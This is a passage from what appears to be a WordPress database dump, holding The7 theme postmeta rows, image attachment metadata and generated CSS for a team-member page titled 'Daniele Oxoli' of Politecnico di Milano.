.fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(21995,3393,'_edit_lock','1670304213:1'),
(21996,3394,'_wp_attached_file','2022/12/w233.jpg'),
(21997,3394,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:74;s:6:\"height\";i:100;s:4:\"file\";s:16:\"2022/12/w233.jpg\";s:8:\"filesize\";i:17127;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21998,3393,'_thumbnail_id','3394'),
(21999,3393,'_edit_last','1'),
(22000,3393,'_dt_sidebar_position','disabled'),
(22001,3393,'_dt_sidebar_widgetarea_id','sidebar_1'),
(22002,3393,'_dt_sidebar_hide_on_mobile','0'),
(22003,3393,'_dt_footer_show','0'),
(22004,3393,'_dt_footer_widgetarea_id','sidebar_2'),
(22005,3393,'_dt_footer_hide_on_mobile','0'),
(22006,3393,'_dt_header_title','fancy'),
(22007,3393,'_dt_header_background','normal'),
(22008,3393,'_dt_header_background_below_slideshow','disabled'),
(22009,3393,'_dt_header_transparent_bg_color_scheme','light'),
(22010,3393,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(22011,3393,'_dt_header_transparent_top_bar_bg_opacity','25'),
(22012,3393,'_dt_header_transparent_bg_color','#000000'),
(22013,3393,'_dt_header_transparent_bg_opacity','50'),
(22014,3393,'_dt_header_disabled_background','normal'),
(22015,3393,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(22016,3393,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(22017,3393,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(22018,3393,'_dt_header_disabled_transparent_bg_color','#000000'),
(22019,3393,'_dt_header_disabled_transparent_bg_opacity','50'),
(22020,3393,'_dt_page_overrides_top_margin',''),
(22021,3393,'_dt_page_overrides_right_margin',''),
(22022,3393,'_dt_page_overrides_bottom_margin',''),
(22023,3393,'_dt_page_overrides_left_margin',''),
(22024,3393,'_dt_mobile_page_padding_top',''),
(22025,3393,'_dt_mobile_page_padding_right',''),
(22026,3393,'_dt_mobile_page_padding_bottom',''),
(22027,3393,'_dt_mobile_page_padding_left',''),
(22028,3393,'_dt_fancy_header_layout_heading',''),
(22029,3393,'_dt_fancy_header_title_aligment','center'),
(22030,3393,'_dt_fancy_header_height','300'),
(22031,3393,'_dt_fancy_header_padding-top','0px'),
(22032,3393,'_dt_fancy_header_padding-bottom','0px'),
(22033,3393,'_dt_fancy_header_breadcrumbs_heading',''),
(22034,3393,'_dt_fancy_header_breadcrumbs','disabled'),
(22035,3393,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(22036,3393,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(22037,3393,'_dt_fancy_header_title_heading',''),
(22038,3393,'_dt_fancy_header_title_mode','custom'),
(22039,3393,'_dt_fancy_header_title','Daniele Oxoli'),
(22040,3393,'_dt_fancy_header_title_font_size','30'),
(22041,3393,'_dt_fancy_header_title_line_height','36'),
(22042,3393,'_dt_fancy_header_text_transform','none'),
(22043,3393,'_dt_fancy_header_title_color_mode','color'),
(22044,3393,'_dt_fancy_header_title_color','#ffffff'),
(22045,3393,'_dt_fancy_header_subtitle_heading',''),
(22046,3393,'_dt_fancy_header_subtitle','Politecnico di Milano, Italy (WG IV/7)'),
(22047,3393,'_dt_fancy_header_subtitle_font_size','18'),
(22048,3393,'_dt_fancy_header_subtitle_line_height','26'),
(22049,3393,'_dt_fancy_header_subtitle_text_transform','none'),
(22050,3393,'_dt_fancy_header_subtitle_color_mode','color'),
(22051,3393,'_dt_fancy_header_subtitle_color','#ffffff'),
(22052,3393,'_dt_fancy_header_bg_heading',''),
(22053,3393,'_dt_fancy_header_bg_color','#222222'),
(22054,3393,'_dt_fancy_header_bg_image_origin','custom'),
(22055,3393,'_dt_fancy_header_bg_image','a:0:{}'),
(22056,3393,'_dt_fancy_header_bg_repeat','no-repeat'),
(22057,3393,'_dt_fancy_header_bg_position_x','center'),
(22058,3393,'_dt_fancy_header_bg_position_y','center'),
(22059,3393,'_dt_fancy_header_bg_fullscreen','1'),
(22060,3393,'_dt_fancy_header_bg_overlay','0'),
(22061,3393,'_dt_fancy_header_overlay_color','#000'),
(22062,3393,'_dt_fancy_header_bg_overlay_opacity','50'),
(22063,3393,'_dt_fancy_header_scroll_effect','default'),
(22064,3393,'_dt_fancy_header_bg_parallax','0.5'),
(22065,3393,'_dt_fancy_header_responsiveness_heading',''),
(22066,3393,'_dt_fancy_header_responsiveness','enabled'),
(22067,3393,'_dt_fancy_header_responsiveness_switch','778px'),
(22068,3393,'_dt_fancy_header_responsive_height','70'),
(22069,3393,'_dt_fancy_header_responsive_font_size','30'),
(22070,3393,'_dt_fancy_header_responsive_title_line_height','38'),
(22071,3393,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(22072,3393,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(22073,3393,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(22074,3393,'_dt_teammate_options_go_to_single','1'),
(22075,3393,'_dt_teammate_options_position',''),
(22076,3393,'_dt_teammate_options_website',''),
(22077,3393,'_dt_teammate_options_mail',''),
(22078,3393,'_dt_teammate_options_facebook',''),
(22079,3393,'_dt_teammate_options_twitter',''),
(22080,3393,'_dt_teammate_options_dribbble',''),
(22081,3393,'_dt_teammate_options_you-tube',''),
(22082,3393,'_dt_teammate_options_rss',''),
(22083,3393,'_dt_teammate_options_delicious',''),
(22084,3393,'_dt_teammate_options_flickr',''),
(22085,3393,'_dt_teammate_options_lastfm',''),
(22086,3393,'_dt_teammate_options_linkedin',''),
(22087,3393,'_dt_teammate_options_vimeo',''),
(22088,3393,'_dt_teammate_options_tumbler',''),
(22089,3393,'_dt_teammate_options_pinterest',''),
(22090,3393,'_dt_teammate_options_devian',''),
(22091,3393,'_dt_teammate_options_skype',''),
(22092,3393,'_dt_teammate_options_github',''),
(22093,3393,'_dt_teammate_options_instagram',''),
(22094,3393,'_dt_teammate_options_stumbleupon',''),
(22095,3393,'_dt_teammate_options_behance',''),
(22096,3393,'_dt_teammate_options_px-500',''),
(22097,3393,'_dt_teammate_options_tripedvisor',''),
(22098,3393,'_dt_teammate_options_vk',''),
(22099,3393,'_dt_teammate_options_foursquare',''),
(22100,3393,'_dt_teammate_options_xing',''),
(22101,3393,'_dt_teammate_options_weibo',''),
(22102,3393,'_dt_teammate_options_odnoklassniki',''),
(22103,3393,'_dt_teammate_options_research-gate',''),
(22104,3393,'_dt_teammate_options_yelp',''),
(22105,3393,'_dt_teammate_options_blogger',''),
(22106,3393,'_dt_teammate_options_soundcloud',''),
(22107,3393,'_dt_teammate_options_viber',''),
(22108,3393,'_dt_teammate_options_whatsapp',''),
(22109,3393,'_dt_teammate_options_reddit',''),
(22110,3393,'_dt_teammate_options_snapchat',''),
(22111,3393,'_dt_teammate_options_telegram',''),
(22112,3393,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(22113,3396,'_wp_attached_file','2022/12/ws23-1.jpg'),
(22114,3396,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:340;s:4:\"file\";s:18:\"2022/12/ws23-1.jpg\";s:8:\"filesize\";i:228672;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"ws23-1-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23331;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"ws23-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10413;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:18:\"ws23-1-500x332.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:332;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50719;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(22115,3386,'the7_shortcodes_dynamic_css','a:2:{s:32:\"8252f2d4b293cbcb7793f5fef06a33f9\";s:6822:\".dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9  .team-media {\n  padding: 5px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9  .team-media img {\n  max-width: 80px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .dt-css-grid .team-media img {\n  width: 80px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(4,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 25%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8252f2d4b293cbcb7793f5fef06a33f9.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid 